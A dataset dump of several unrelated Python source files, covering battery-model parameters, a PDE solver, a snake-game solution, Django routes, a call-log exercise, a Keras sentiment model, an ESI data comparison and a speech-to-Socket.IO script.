pybamm.thermal_parameters.E_k_e\n\n# velocity scale\nvelocity_scale = pybamm.Scalar(1)\n\n# --------------------------------------------------------------------------------------\n\"2. Dimensional Functions\"\n\n\ndef D_e_dimensional(c_e, T):\n \"Dimensional diffusivity in electrolyte\"\n return pybamm.FunctionParameter(\n \"Electrolyte diffusivity [m2.s-1]\", c_e, T, T_ref, E_D_e, R\n )\n\n\ndef kappa_e_dimensional(c_e, T):\n \"Dimensional electrolyte conductivity\"\n return pybamm.FunctionParameter(\n \"Electrolyte conductivity [S.m-1]\", c_e, T, T_ref, E_k_e, R\n )\n\n\ndef D_n_dimensional(c_n, T):\n \"Dimensional diffusivity in negative particle\"\n return pybamm.FunctionParameter(\n \"Negative electrode diffusivity [m2.s-1]\", c_n, T, T_ref, E_D_s_n, R\n )\n\n\ndef D_p_dimensional(c_p, T):\n \"Dimensional diffusivity in positive particle\"\n return pybamm.FunctionParameter(\n \"Positive electrode diffusivity [m2.s-1]\", c_p, T, T_ref, E_D_s_p, R\n )\n\n\ndef m_n_dimensional(T):\n \"Dimensional negative reaction rate\"\n return pybamm.FunctionParameter(\n \"Negative electrode reaction rate\", T, T_ref, E_r_n, R\n )\n\n\ndef m_p_dimensional(T):\n \"Dimensional negative reaction rate\"\n return pybamm.FunctionParameter(\n \"Positive electrode reaction rate\", T, T_ref, E_r_p, R\n )\n\n\ndef dUdT_n_dimensional(sto):\n \"\"\"\n Dimensional entropic change of the negative electrode open-circuit potential [V.K-1]\n \"\"\"\n return pybamm.FunctionParameter(\n \"Negative electrode OCP entropic change [V.K-1]\", sto, c_n_max\n )\n\n\ndef dUdT_p_dimensional(sto):\n \"\"\"\n Dimensional entropic change of the positive electrode open-circuit potential [V.K-1]\n \"\"\"\n return pybamm.FunctionParameter(\n \"Positive electrode OCP entropic change [V.K-1]\", sto, c_p_max\n )\n\n\ndef U_n_dimensional(sto, T):\n \"Dimensional open-circuit potential in the negative electrode [V]\"\n u_ref = pybamm.FunctionParameter(\"Negative electrode OCP [V]\", sto)\n return u_ref + (T - T_ref) * dUdT_n_dimensional(sto)\n\n\ndef U_p_dimensional(sto, T):\n \"Dimensional open-circuit potential in the positive electrode [V]\"\n u_ref = pybamm.FunctionParameter(\"Positive electrode OCP [V]\", sto)\n return u_ref + (T - T_ref) * dUdT_p_dimensional(sto)\n\n\n# can maybe improve ref value at some stage\nU_n_ref = U_n_dimensional(c_n_init_dimensional / c_n_max, T_ref)\n\n# can maybe improve ref value at some stage\nU_p_ref = U_p_dimensional(c_p_init_dimensional / c_p_max, T_ref)\n\nm_n_ref_dimensional = m_n_dimensional(T_ref)\nm_p_ref_dimensional = m_p_dimensional(T_ref)\n\n# -------------------------------------------------------------------------------------\n\"3. Scales\"\n# concentration\nelectrolyte_concentration_scale = c_e_typ\nnegative_particle_concentration_scale = c_n_max\npositive_particle_concentration_scale = c_p_max\n\n# electrical\npotential_scale = R * T_ref / F\ncurrent_scale = i_typ\ninterfacial_current_scale_n = i_typ / (a_n_dim * L_x)\ninterfacial_current_scale_p = i_typ / (a_p_dim * L_x)\n\n# Discharge timescale\ntau_discharge = F * c_n_max * L_x / i_typ\n\n# Reaction timescales\ntau_r_n = F / (m_n_ref_dimensional * a_n_dim * c_e_typ ** 0.5)\ntau_r_p = F / (m_p_ref_dimensional * a_p_dim * c_e_typ ** 0.5)\n\n# Electrolyte diffusion timescale\ntau_diffusion_e = L_x ** 2 / D_e_dimensional(c_e_typ, T_ref)\n\n# Particle diffusion timescales\ntau_diffusion_n = R_n ** 2 / D_n_dimensional(c_n_max, T_ref)\ntau_diffusion_p = R_p ** 2 / D_p_dimensional(c_p_max, T_ref)\n\n# Thermal diffusion timescale\ntau_th_yz = pybamm.thermal_parameters.tau_th_yz\n\n# --------------------------------------------------------------------------------------\n\"4. Dimensionless Parameters\"\n# Timescale ratios\nC_n = tau_diffusion_n / tau_discharge\nC_p = tau_diffusion_p / tau_discharge\nC_e = tau_diffusion_e / tau_discharge\nC_r_n = tau_r_n / tau_discharge\nC_r_p = tau_r_p / tau_discharge\nC_th = tau_th_yz / tau_discharge\n\n# Concentration ratios\ngamma_e = c_e_typ / c_n_max\ngamma_p = c_p_max / c_n_max\n\n# Macroscale Geometry\nl_cn = pybamm.geometric_parameters.l_cn\nl_n = pybamm.geometric_parameters.l_n\nl_s = pybamm.geometric_parameters.l_s\nl_p = pybamm.geometric_parameters.l_p\nl_cp = pybamm.geometric_parameters.l_cp\nl_x = pybamm.geometric_parameters.l_x\nl_y = pybamm.geometric_parameters.l_y\nl_z = pybamm.geometric_parameters.l_z\na_cc = pybamm.geometric_parameters.a_cc\nl = pybamm.geometric_parameters.l\ndelta = pybamm.geometric_parameters.delta\n\n# Tab geometry\nl_tab_n = pybamm.geometric_parameters.l_tab_n\ncentre_y_tab_n = pybamm.geometric_parameters.centre_y_tab_n\ncentre_z_tab_n = pybamm.geometric_parameters.centre_z_tab_n\nl_tab_p = pybamm.geometric_parameters.l_tab_p\ncentre_y_tab_p = pybamm.geometric_parameters.centre_y_tab_p\ncentre_z_tab_p = pybamm.geometric_parameters.centre_z_tab_p\n\n# Microscale geometry\nepsilon_n = pybamm.Parameter(\"Negative electrode porosity\")\nepsilon_s = pybamm.Parameter(\"Separator porosity\")\nepsilon_p = pybamm.Parameter(\"Positive electrode porosity\")\nepsilon = pybamm.Concatenation(\n pybamm.FullBroadcast(epsilon_n, [\"negative electrode\"], \"current collector\"),\n pybamm.FullBroadcast(epsilon_s, [\"separator\"], \"current collector\"),\n pybamm.FullBroadcast(epsilon_p, [\"positive electrode\"], \"current collector\"),\n)\nepsilon_s_n = pybamm.Parameter(\"Negative electrode active material volume fraction\")\nepsilon_s_p = pybamm.Parameter(\"Positive electrode active material volume fraction\")\nepsilon_inactive_n = 1 - epsilon_n - epsilon_s_n\nepsilon_inactive_s = 1 - epsilon_s\nepsilon_inactive_p = 1 - epsilon_p - epsilon_s_p\na_n = a_n_dim * R_n\na_p = a_p_dim * R_p\n\n# Electrode Properties\nsigma_cn = sigma_cn_dimensional * potential_scale / i_typ / L_x\nsigma_n = sigma_n_dim * potential_scale / i_typ / L_x\nsigma_p = sigma_p_dim * potential_scale / i_typ / L_x\nsigma_cp = sigma_cp_dimensional * potential_scale / i_typ / L_x\nsigma_cn_prime = sigma_cn * delta ** 2\nsigma_n_prime = sigma_n * delta\nsigma_p_prime = sigma_p * delta\nsigma_cp_prime = sigma_cp * delta ** 2\nsigma_cn_dbl_prime = sigma_cn_prime * delta\nsigma_cp_dbl_prime = sigma_cp_prime * delta\n# should rename this to avoid confusion with Butler-Volmer\nalpha = 1 / (sigma_cn * delta ** 2 * l_cn) + 1 / (sigma_cp * delta ** 2 * l_cp)\nalpha_prime = alpha / delta\n\n# Electrolyte Properties\nt_plus = pybamm.Parameter(\"Cation transference number\")\nbeta_surf = 0\ns = 1 - t_plus\n\n\n# (1-2*t_plus) is for Nernst-Planck\n# 2*(1-t_plus) for Stefan-Maxwell\n# Bizeray et al (2016) \"Resolving a discrepancy ...\"\n# note: this is a function for consistancy with lead-acid\ndef chi(c_e):\n return 2 * (1 - t_plus)\n\n\n# Electrochemical Reactions\nC_dl_n = (\n C_dl_dimensional * potential_scale / interfacial_current_scale_n / tau_discharge\n)\nC_dl_p = (\n C_dl_dimensional * potential_scale / interfacial_current_scale_p / tau_discharge\n)\n\n# Electrical\nvoltage_low_cut = (voltage_low_cut_dimensional - (U_p_ref - U_n_ref)) / potential_scale\nvoltage_high_cut = (\n voltage_high_cut_dimensional - (U_p_ref - U_n_ref)\n) / potential_scale\n\n# Thermal\nrho_cn = pybamm.thermal_parameters.rho_cn\nrho_n = pybamm.thermal_parameters.rho_n\nrho_s = pybamm.thermal_parameters.rho_s\nrho_p = pybamm.thermal_parameters.rho_p\nrho_cp = pybamm.thermal_parameters.rho_cp\n\nrho_k = pybamm.thermal_parameters.rho_k\nrho = rho_n * l_n + rho_s * l_s + rho_p * l_p\n\nlambda_cn = pybamm.thermal_parameters.lambda_cn\nlambda_n = pybamm.thermal_parameters.lambda_n\nlambda_s = pybamm.thermal_parameters.lambda_s\nlambda_p = pybamm.thermal_parameters.lambda_p\nlambda_cp = pybamm.thermal_parameters.lambda_cp\n\nlambda_k = pybamm.thermal_parameters.lambda_k\n\nTheta = pybamm.thermal_parameters.Theta\nh = pybamm.thermal_parameters.h\nB = (\n i_typ\n * R\n * T_ref\n * tau_th_yz\n / (pybamm.thermal_parameters.rho_eff_dim * F * Delta_T * L_x)\n)\n\n# Initial conditions\nc_e_init = c_e_init_dimensional / c_e_typ\nc_n_init = c_n_init_dimensional / c_n_max\nc_p_init = c_p_init_dimensional / c_p_max\nT_init = pybamm.thermal_parameters.T_init\n\n\n# --------------------------------------------------------------------------------------\n\"5. Dimensionless Functions\"\n\n\ndef D_e(c_e, T):\n \"Dimensionless electrolyte diffusivity\"\n c_e_dimensional = c_e * c_e_typ\n T_dim = Delta_T * T + T_ref\n return D_e_dimensional(c_e_dimensional, T_dim) / D_e_dimensional(c_e_typ, T_ref)\n\n\ndef kappa_e(c_e, T):\n \"Dimensionless electrolyte conductivity\"\n c_e_dimensional = c_e * c_e_typ\n kappa_scale = F ** 2 * D_e_dimensional(c_e_typ, T_ref) * c_e_typ / (R * T_ref)\n T_dim = Delta_T * T + T_ref\n return kappa_e_dimensional(c_e_dimensional, T_dim) / kappa_scale\n\n\ndef D_n(c_s_n, T):\n \"Dimensionless negative particle diffusivity\"\n c_s_n_dimensional = c_s_n * c_n_max\n T_dim = Delta_T * T + T_ref\n return D_n_dimensional(c_s_n_dimensional, T_dim) / D_n_dimensional(c_n_max, T_ref)\n\n\ndef D_p(c_s_p, T):\n \"Dimensionless positive particle diffusivity\"\n c_s_p_dimensional = c_s_p * c_p_max\n T_dim = Delta_T * T + T_ref\n return D_p_dimensional(c_s_p_dimensional, T_dim) / D_p_dimensional(c_p_max, T_ref)\n\n\ndef m_n(T):\n \"Dimensionless negative reaction rate\"\n T_dim = Delta_T * T + T_ref\n return m_n_dimensional(T_dim) / m_n_ref_dimensional\n\n\ndef m_p(T):\n \"Dimensionless positive reaction rate\"\n T_dim = Delta_T * T + T_ref\n return m_p_dimensional(T_dim) / m_p_ref_dimensional\n\n\ndef U_n(c_s_n, T):\n \"Dimensionless open-circuit potential in the negative electrode\"\n sto = c_s_n\n T_dim = Delta_T * T + T_ref\n return (U_n_dimensional(sto, T_dim) - U_n_ref) / potential_scale\n\n\ndef U_p(c_s_p, T):\n \"Dimensionless open-circuit potential in the positive electrode\"\n sto = c_s_p\n T_dim = Delta_T * T + T_ref\n return (U_p_dimensional(sto, T_dim) - U_p_ref) / potential_scale\n\n\ndef dUdT_n(c_s_n):\n \"Dimensionless entropic change in negative open-circuit potential\"\n sto = c_s_n\n return dUdT_n_dimensional(sto) * Delta_T / potential_scale\n\n\ndef dUdT_p(c_s_p):\n \"Dimensionless entropic change in positive open-circuit potential\"\n sto = c_s_p\n return dUdT_p_dimensional(sto) * Delta_T / potential_scale\n\n\n# --------------------------------------------------------------------------------------\n\"6. Input current\"\ndimensional_current_with_time = pybamm.FunctionParameter(\n \"Current function\", pybamm.t * tau_discharge\n)\ndimensional_current_density_with_time = dimensional_current_with_time / (\n n_electrodes_parallel * pybamm.geometric_parameters.A_cc\n)\n\ncurrent_with_time = (\n dimensional_current_with_time / I_typ * pybamm.Function(np.sign, I_typ)\n)\n","repo_name":"zlgenuine/pybamm","sub_path":"pybamm/parameters/standard_parameters_lithium_ion.py","file_name":"standard_parameters_lithium_ion.py","file_ext":"py","file_size_in_byte":14866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70582535492","text":"import os\nimport math\nfrom importlib import reload\nfrom itertools import product\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom IPython.display import display\n\nimport nnpde.iterative_methods as im\nfrom nnpde.metrics import least_squares_loss as LSE\nfrom nnpde import geometries, helpers\nfrom nnpde.utils.logs import enable_logging, logging \nfrom nnpde.problems import DirichletProblem, after_solver\nfrom nnpde.utils import plots\nimport nnpde.model as M \nimport nnpde.model_testing as MT\nimport nnpde.problems as PDEF\nfrom nnpde.grid_search import grid_search\n\nfrom tqdm.notebook import tqdm\n\nclass Grid_Object:\n \"\"\"Geometry class\n\n Parameters\n ----------\n n_dims : int, dimensionality of data\n \n cube_coords: borders of cube. given as [n_dims, 2] tensor \n\n N: torch.tensor [n_dims]. number of grid points on each side\n \n h: float !!!. note that if N is given it has to make sure,\n that h in each dimension is the same\n\n Returns\n -------\n self : object\n Returns an instance of self.\n \"\"\"\n\n def __init__(self,\n n_dims,\n cube_coords,\n N = None, h = None):\n\n self.n_dims = n_dims\n self.cube_coords = cube_coords\n self.N = N\n self.h = h\n\n if h is None:\n self.h = (cube_coords[0, 1] - \n cube_coords[0, 0])/(N[0]-1)\n\n if N is None:\n ans = list()\n for i in range(n_dims):\n ans.append(math.floor((cube_coords[i, 1] - cube_coords[i, 0])/(h)))\n self.N = torch.tensor(ans, dtype=torch.long) + 1\n self.h = (cube_coords[0, 1] - \n cube_coords[0, 0])/(self.N[0]-1)\n # N might be different from given h, so it is easier to shif h for found N\n\n self.grad_log = None\n\n def get_logs(self, distribution):\n grd_size = torch.cat((torch.tensor([self.n_dims]), self.N))\n self.grad_log = torch.zeros(grd_size.tolist())\n\n ind = torch.zeros(self.n_dims, dtype=torch.int)\n over = False\n\n while not over:\n point = []\n for i in range(self.n_dims):\n x = self.cube_coords[i, 0] + self.h*ind[i]\n point.append(x)\n\n point = torch.tensor(point, requires_grad = True)\n val = distribution.log_prob(point)\n val.backward()\n\n for i in range(self.n_dims):\n self.grad_log[tuple([i, *ind.tolist()])] = point.grad[i]\n over = True\n\n for i in range(self.n_dims):\n ind[i] += 1\n if ind[i] == self.N[i]:\n ind[i] = 0\n else:\n over = False\n break\n self.grad_log = self.grad_log.reshape([1, *grd_size.tolist()])\n\n\n def set_borders(self):\n B_idx = torch.zeros(self.N.tolist())\n B = torch.zeros(self.N.tolist())\n\n ind = torch.zeros(self.n_dims, dtype=torch.int)\n over = False\n\n while not over:\n if torch.any(ind == 0) or torch.any(ind == self.N-1):\n B[tuple(ind.tolist())] = torch.rand([1])\n B_idx[tuple(ind.tolist())] = 0\n else:\n B[tuple(ind.tolist())] = 0\n B_idx[tuple(ind.tolist())] = 1\n\n over = True\n\n for i in range(self.n_dims):\n ind[i] += 1\n if ind[i] == self.N[i]:\n ind[i] = 0\n else:\n over = False\n break\n return B_idx.reshape([1, 1, *self.N.tolist()]), B.reshape([1, 1, *self.N.tolist()])\n\n def create_f_grid(self, function):\n ans = torch.zeros(self.N.tolist())\n\n ind = torch.zeros(self.n_dims, dtype=torch.int)\n over = False\n\n while not over:\n\n point = []\n for i in range(self.n_dims):\n x = self.cube_coords[i, 0] + self.h*ind[i]\n point.append(x)\n \n point = torch.tensor(point).reshape(1, -1)\n\n ans[tuple(ind.tolist())] = function(point)\n over = True\n\n for i in range(self.n_dims):\n ind[i] += 1\n if ind[i] == self.N[i]:\n ind[i] = 0\n else:\n over = False\n break\n return ans.reshape([1, 1, *self.N.tolist()])\n\n\n\nclass Solve_Area:\n \"\"\"Implemented solver for stein cv\n\n Parameters\n ----------\n n_dims : int, dimensionality of data\n \n cube_coords: borders of cube. given as [n_dims, 2] tensor\n\n N: torch.tensor [n_dims]. number of grid points on each side\n \n h: torch.tensor [n_dims], distance between adjacent nodes on each coordinate\n \n\n Returns\n -------\n self : object\n Returns an instance of self.\n \"\"\"\n\n def __init__(self,\n n_dims,\n cube_coords,\n distribution,\n N = None, h = None):\n\n\n if N is None and h is None:\n raise ValueError('Specify N or h')\n\n self.my_grid = Grid_Object(n_dims, cube_coords, N, h)\n\n self.my_grid.get_logs(distribution) # calculates gradient in all nodes of grid and saves them as GridObject attribute\n\n self.my_solver = None\n\n self.aslv = None\n\n def train_model(self, base_parameters, prob_inst = 20, f = None):\n # For each problem instance define number of iteration to perform to obtain the solution\n problem_instances = []\n for i in tqdm(range(prob_inst)):\n k = np.random.randint(1, 20)\n problem_instances.append(DirichletProblem(k=k, grid = self.my_grid, f = f))\n\n self.my_solver = M.JacobyWithConv(**base_parameters)\n self.my_solver.fit(problem_instances)\n self.my_solver.net.eval()\n\n def solve_setting(self, function, samples, k = 1000):\n mean_val = torch.mean(function(samples))\n f_table = self.my_grid.create_f_grid(function) - mean_val\n self.aslv = after_solver(f = f_table, grid = self.my_grid, \n k = k, model = self.my_solver)\n\n def get_cv(self, points):\n #points : [n_points, n_dims]\n # note: this works for currently set aslv\n # current heuristic: cv of point equals to cv of closest node on grid\n ans = []\n for point in points:\n closest_on_grid = []\n n = len(self.my_grid.N.tolist())\n for i in range(n):\n coords = torch.linspace(self.my_grid.cube_coords[i, 0],\n self.my_grid.cube_coords[i, 1],\n self.my_grid.N[i])\n j = torch.argmin(torch.abs(coords - point[i]))\n closest_on_grid.append(j)\n ans.append(self.aslv.sec_der[tuple([0, 0, *closest_on_grid])])\n return torch.tensor(ans)\n\n\n\n","repo_name":"ArturGoldman/NN_DE_solver","sub_path":"poiss_sol_general/nnpde/solve_area.py","file_name":"solve_area.py","file_ext":"py","file_size_in_byte":7063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15063202194","text":"import re\nimport sys\ninput = sys.stdin.readline\n\nn=int(input())\narr = [[1 for _ in range(n+1)] for _ in range(n+1)]\n\nk=int(input())\napples = [list(map(int, input().split())) for _ in range(k)]\nfor y,x in apples:\n arr[y][x]=-1\n\nl=int(input())\ndirections = [list(map(int, input().split())) for _ in range(l)]\n\ntail_y=0\ntail_x=0\ny=1\nx=1\n\ndirection = 0 # 0:동, 1:남, 2:서, 3:북\ndy=[1,0,0,-1]\ndx=[0,1,-1,0]\ncnt=0\n\nfor weight, next_direction in directions:\n \n for _ in range(weight):\n next_y = y+dy[direction]\n next_x = x+dx[direction]\n \n if 0', views.product_list,name='product_list_category'),\n path('', views.product_detail,name='product_detail'),\n]\n","repo_name":"MoatazMohamedAllam/Olex-Clone","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74490987333","text":"\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files.\n\"\"\"\nimport csv\nfrom datetime import datetime\nimport operator\nimport itertools\n\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n\"\"\"\nTASK 4:\nThe telephone company want to identify numbers that might be doing\ntelephone marketing. Create a set of possible telemarketers:\nthese are numbers that make outgoing calls but never send texts,\nreceive texts or receive incoming calls.\n\nPrint a message:\n\"These numbers could be telemarketers: \"\n\nThe list of numbers should be print out one per line in lexicographic order with no duplicates.\n\"\"\"\n\n# lets creaate variables to dissect to dissect the two tables\n\n# creating a set to store unique telephone numbers from the calls and texts lists outgoing and receiving\n\n# i will get a set with phone numbers making calls and sending texts outgoing()\n# also another set with phones receiving calls and receiving texts non_tele()\n# then , get the difference to extract possible telemarketers\n\noutgoing = set()\nnon_tele = set()\n\nfor call in calls:\n outgoing.add(call[0])\n non_tele.add(call[1])\n\nfor text in texts:\n outgoing.add(text[0])\n non_tele.add(text[1])\n \n# the difference are possible telemarketers stored in telemarketers \n\ntelemarketers = outgoing.difference(non_tele)\n \nprint(\"These numbers could be telemarketers: \",'\\n'.join(map(str, sorted(telemarketers)))) \n \n\n\n \n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"cfreeman22/Data-Structures-And-Algorithms-","sub_path":"submit/Task4.py","file_name":"Task4.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69794213162","text":"import pandas as pd \r\n\r\ndataaf = pd.read_csv(r\"C:\\Users\\User\\Desktop\\Artificial intelligence\\Machine learning\\Deep learning\\Amazon frr deep\\clean data\\dataaftercleanafterlemm.csv\")\r\n\r\n \r\nfrom keras.preprocessing.text import Tokenizer\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nfrom keras.layers import Embedding, LSTM, Dense\r\nfrom keras.models import Sequential\r\n\r\n# to make sure there is no float in data\r\nfor i in range (len(dataaf[\"cleantext\"])):\r\n dataaf.iloc[i,1]=str(dataaf.iloc[i,1])\r\n\r\n\r\nx = dataaf[\"cleantext\"]\r\ny = dataaf[\"label_name\"].values # Convert \"Sentiment\" to a NumPy array\r\ntokenizer = Tokenizer()\r\ntokenizer.fit_on_texts(x)\r\nsequences = tokenizer.texts_to_sequences(x)\r\n\r\nword_index = tokenizer.word_index\r\nvocab_size = len(word_index) + 1\r\nmax_sequence_length = 100#to control the length of the sequences\r\npadded_sequences = pad_sequences(sequences, maxlen=max_sequence_length)\r\n\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(padded_sequences, y, test_size=0.2, random_state=42)\r\n\r\nembedding_dim = 70\r\nmodel = Sequential()\r\nmodel.add(Embedding(input_dim=vocab_size, output_dim=embedding_dim, input_length=max_sequence_length))\r\nmodel.add(LSTM(128))\r\nmodel.add(Dense(64, activation='relu'))\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dense(1, activation='linear'))\r\nmodel.compile(loss='mean_squared_error', optimizer='adam')\r\nmodel.summary()\r\n\r\nmodel.fit(X_train, y_train, batch_size=50, epochs=10)\r\n\r\nmse = model.evaluate(X_test, y_test)\r\nprint(\"Mean Squared Error:\", mse)\r\n\r\n\r\n\r\n# saving the model\r\nmodel.save(r\"C:\\Users\\User\\Desktop\\Artificial intelligence\\Machine learning\\Deep learning\\Amazon frr deep\\deepmodel.h5\")\r\n\r\nimport pickle\r\n\r\nfile_path = r\"C:\\Users\\User\\Desktop\\Artificial intelligence\\Machine learning\\Deep learning\\Amazon frr deep\\tokenizer.pickle\"\r\nwith open(file_path, 'wb') as handle:\r\n pickle.dump(tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n","repo_name":"Baraa-Melhem/Amazon_ffr","sub_path":"Amazon frr deep/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36959551174","text":"# -*- coding : UTF-8 -*-\n\nfrom collections import deque\n\nn,k = map(int,input().split())\nw = []\nfor _ in range(n):\n w.append(int(input()))\n\ndef v(P):\n # 最大荷重をPとしたときに、詰める荷物の総重量を求める関数\n # P >= max(w) の範囲でのみ考える\n\n track = {}\n num = 0\n\n for i in range(1,k+1):\n s = 0\n while s + w[num] <= P:\n s+=w[num]\n num+=1\n\n if num == n:\n return n\n\n return num\n\ndef solve():\n left = 0\n right = 100000 * 10000\n\n mid = (left+right)//2\n \n return P","repo_name":"mochita314/algorithm","sub_path":"spiral/alds1_4_d.py","file_name":"alds1_4_d.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"69967046442","text":"\"\"\"\nDescription: Compare the output from our 2 methods of acquiring ESI data (polygon vs tif/row/col method.)\nCompare values across the 8 closest pixels (user can change that value).\nTo get the closest pixels, I used centroids (or middle of the pixel) long/lats.\nNOTE TO SELF: I should change the distance comparison using the haversine method!!!\n\nFile Name: get_ESI_tif.py\nAuthor: Carol A. Rowe\nDate Created: 2021-05-10\n\nUsage: python ESI_output_comparison.py SCAN_AL_metadata.csv poly_ESI_df.csv ESI_tif2select_pt.csv master_ESI_CLIP_xyz.csv\n\nTHIS IS IN PROGRESS....MAY NOT BE FUNCTIONAL AS A STAND-ALONE SCRIPT AS OF YET!!!!!!\n\"\"\"\n\n__author__ = \"Carol A. Rowe\"\n\nimport pandas as pd\nimport argparse\n\ndef ESI_output_comparison(metadata, poly_ESI, tif_ESI, xyz, date, num_nearest):\n metad = pd.read_csv(metadata)\n meta = metad[['longitude', 'latitude', 'stationTriplet']]\n poly = pd.read_csv(poly_ESI)\n tif = pd.read_csv(tif_ESI)\n xyz = pd.read_csv(xyz)\n\n # want the print statements into a txt file\n with open(\"comparison_output.txt\", \"a\") as f:\n # for each station print out comparison of 8 closest pts in the centroids\n for i in range(0,meta.shape[0]):\n # Getting the actual lat/long coords\n xx = meta.loc[i, 'longitude'].astype(float)\n yy = meta.loc[i, 'latitude'].astype(float)\n print('---------------------NEXT-------------------', file=f)\n print('Actual location: {}', format(xx, yy), file=f)\n # get station name\n stn = meta.loc[i, 'stationTriplet']\n print('Station is: {}'.format(stn), file=f)\n # get the lat and long closest to the centroid lat/long (output from either merge_esi_csv.py or tif2xyz.sh)\n # getting the 8 closest centroids using absolute value of subtracting the actual lat/long to centroid lat/long\n # this returns a pd.Series with the index values of the 8 centroids\n index_xyz = ( xyz['x'].sub(xx).abs() + xyz['y'].sub(yy).abs()).argsort()[:num_nearest]\n # make a list of the index values of the 8 closest centroids\n index_list = index_xyz.values.tolist()\n # use index values to subset the xyz dataframe\n xyz_mini = xyz.iloc[index_list, :]\n # make a new column to show a proxy of dist between pt and centroid using absolute value of simple subtraction\n xyz_mini['abs_min'] = ((xyz_mini['x']-xx).abs()) + ((xyz_mini['y']-yy).abs())\n\n # get the ESI value from the poly csv file; apply that value to entire new column\n poly_mini = poly[ (poly['station']==stn) & (poly['date']==date)]\n poly_mini.reset_index(drop=True, inplace=True)\n poly_vals = poly_mini.loc[0,'avg']\n # add value to the output dataframe\n xyz_mini['poly'] = poly_vals\n\n # get the ESI value from the tif csv file; apply that value to entire new column\n tif_mini = tif[ (tif['station']==stn) & (tif['Date']==date)]\n tif_mini.reset_index(drop=True, inplace=True)\n tif_vals = tif_mini.loc[0,'ESI']\n # add value to the output dataframe\n xyz_mini['tif'] = tif_vals\n\n print(xyz_mini, file=f)\n\n# if name in main so that we can run the script by itself (main)\n# or, it can be used embedded (import ESI_tf_clip.py) within another script\nif __name__ in '__main__':\n # This allows the --help to show the docstring\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)\n # Add the input arguments: 4 mandatory, 2 optional\n parser.add_argument('metadata', metavar='metadata.csv', help=\"Enter the pathway and filename for your shapefile. i.e. './SCAN_metadata.csv' File must contain columns: longitude, latitude, stationTriplet\")\n parser.add_argument('poly_ESI', metavar='poly_ESI_df.csv', help=\"Enter the pathway and filename for your poly_ESI_df.csv file. This is the output file from script:get_ESI_select_pt.py\")\n parser.add_argument('tif_ESI', metavar='ESI_tif2select_pt.csv', help=\"Enter the pathway and filename for your ESI_tif2select_pt.csv file. This is the output file from script: tif2select_pts.py\")\n parser.add_argument('xyz', metavar='master_ESI_CLIP_xyz.csv', help=\"Enter the pathway and filename to your master_ESI_CLIP_xyz.csv or individual _CLIP.csv file. Output from either tif2xyz.sh or merge_esi_csv.py\")\n\n # Next 2 arguments are optional\n parser.add_argument('-d', '--date', help=\"Enter date of ESI file as yyyy-mm-dd\", type=str,\n default='2021-03-30', required=False)\n parser.add_argument('-n', '--num_nearest',\n help=\"Enter the number of nearest centroids you want to compare to. Default = 8\",\n type=int, default=8, required=False)\n\n # array for all arguments passed to the script\n args = parser.parse_args()\n\n # now you can access the arguments input by the user and apply to our function\n ESI_output_comparison(args.metadata, args.poly_ESI, args.tif_ESI, args.xyz, args.date, args.num_nearest)\n","repo_name":"carol-rowe666/ClimateSERV_ESI_data","sub_path":"Comparison_SCRIPTS/ESI_output_comparison.py","file_name":"ESI_output_comparison.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14757474851","text":"def letters_filter(file):\n letters_dict = dict()\n for i_line in file:\n for i_letter in i_line.lower():\n if i_letter.isalpha():\n if i_letter not in letters_dict:\n letters_dict[i_letter] = 0\n letters_dict[i_letter] += 1\n return letters_dict\n\n\ndef letters_sort(letters_dict):\n letters_l = []\n letters_total = sum(letters_dict.values())\n for sym, freq in letters_dict.items():\n freq_percent = round(freq / letters_total, 3)\n letters_l.append([sym, freq_percent])\n\n return sorted(letters_l, key=lambda x: (-x[1], x[0]))\n\n\ndef text_sort(sorted_list):\n text = ''\n for i_line in sorted_list:\n text += i_line[0] + ' ' + str(i_line[1]) + '\\n'\n return text\n\n\nfile_from = open('text.txt', 'r')\nletters_dict = letters_filter(file_from)\nfile_from.close()\nletters_list = letters_sort(letters_dict)\ntext = text_sort(letters_list)\n\nfile_to = open('analysis.txt', 'w')\nfile_to.write(text)\nfile_to.close()\n","repo_name":"Elfateru/python_basic","sub_path":"Module22/08_frequency_analysis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32409281842","text":"import speech_recognition as sr\nimport socketio\nimport datetime\nimport uuid\n\n\nfor index, name in enumerate(sr.Microphone.list_microphone_names()):\n print(\"Microphone with name \\\"{1}\\\" found for `Microphone(device_index={0})`\".format(index, name))\n\n\ndef send_detected_voice(text, time, uniqueId):\n detestedVoice = {}\n detestedVoice[\"comment\"] = text\n detestedVoice[\"time\"] = time\n detestedVoice[\"uniqueId\"] = uniqueId\n return detestedVoice\n\n\ndef speech_recognition():\n sio = socketio.Client()\n sio.connect('https://univas.herokuapp.com/')\n \n 